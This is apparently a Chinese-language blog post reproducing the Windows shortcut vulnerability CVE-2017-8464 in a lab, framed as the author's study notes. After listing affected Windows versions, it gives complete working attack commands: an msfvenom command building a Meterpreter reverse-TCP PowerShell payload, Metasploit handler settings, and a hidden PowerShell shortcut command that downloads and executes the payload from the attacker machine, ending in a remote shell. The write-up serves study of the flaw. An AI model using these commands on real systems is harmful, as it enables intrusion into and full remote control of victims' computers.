![7056992fae9bbe5d64c541cc5ef0144d.png](https://i-blog.csdnimg.cn/blog_migrate/133900345379dd0724600a867fdc54b6.jpeg)
闲来没事翻翻漏洞复现的进程,哎。。。这个漏洞复现还是做了吧,当作自己的笔记与大家分享一下,其实网上有许多这样的文章,本小白只是打着学习漏洞原理来进行漏洞复现。
CVE-2017-8464的漏洞:官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。这个漏洞影响的版本其实挺多的。
可以远程利用的漏洞版本:
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 10 version 1511 for 32-bit Systems
- Microsoft Windows 10 version 1511 for x64-based Systems
- Microsoft Windows 10 version 1703 for 32-bit Systems
- Microsoft Windows 10 version 1703 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows RT 8.1
服务器系统
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016
实验环境:
攻击机:Ubuntu
IP地址:192.168.205.138
靶机: Microsoft Windows Server 2008
IP地址:192.168.205.135
注明一下:本打算使用kali2.0作为攻击机,由于出了点小状况,故使用乌班图虚机作为攻击机。
话不多说,拿起工具开始干:
首先,我们现在乌班图虚机中创建一个shell,名称为cmdback.ps1:
执行命令msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.205.138 lport=6666 -f psh-reflection>cmdback.ps1,在网站目录下生成了一个cmdback.ps1的文件:
![3fead599b859841afeb5b099bd63ce87.png](https://i-blog.csdnimg.cn/blog_migrate/c321236ad77269bbd3a13dd10e5624e4.jpeg)
访问乌班图中生成的shell文件:
![b5eafb60592902b04fb5cc0702b370be.png](https://i-blog.csdnimg.cn/blog_migrate/8fb8da3336f0a2c8c73923e0f5232d35.jpeg)
启动msf进行设置反弹参数信息:
(1)、输入命令进入 use exploit/multi/handler
指定本机IP set LHOST 192.168.205.138
指定端口 set LPORT 6666
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
![5e519e33cb5d2eab891206061c9c4730.png](https://i-blog.csdnimg.cn/blog_migrate/20cb070ab336cfb8eb2c4ac75a9f0f8e.jpeg)
上述工作做完之后,在靶机上面创建posershell.exe的快捷键:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.205.138/cmdback.ps1');test.ps1"
![e242fe404412954040c4d5fdd6b95fea.png](https://i-blog.csdnimg.cn/blog_migrate/6470184a0cb1005e8d36358dd4e887cb.jpeg)
点击下一步,生成的*.exe文件:
![8b6dce0f4cd973fe5811df68c3e401fd.png](https://i-blog.csdnimg.cn/blog_migrate/30c8935ff0f60212d12b17f04325a3ab.jpeg)
![93d574135c0316b6e17106a64d1fa8af.png](https://i-blog.csdnimg.cn/blog_migrate/8669826afa008090734b7e2a082e087f.jpeg)
最后我们在攻击机上面输入exploit ,同时在靶机上面运行powershell.exe快捷键:
![138d79397a50dd2cc96d406b08da5e93.png](https://i-blog.csdnimg.cn/blog_migrate/f1b01d77afb166ccd9bfae99e02a099c.jpeg)
输入shell,成功获取目标主机的权限:
![e7c31f6cb93ff00b42ff06aaba88dfb2.png](https://i-blog.csdnimg.cn/blog_migrate/b3011f2e56db976a838b68e4edf77c51.jpeg)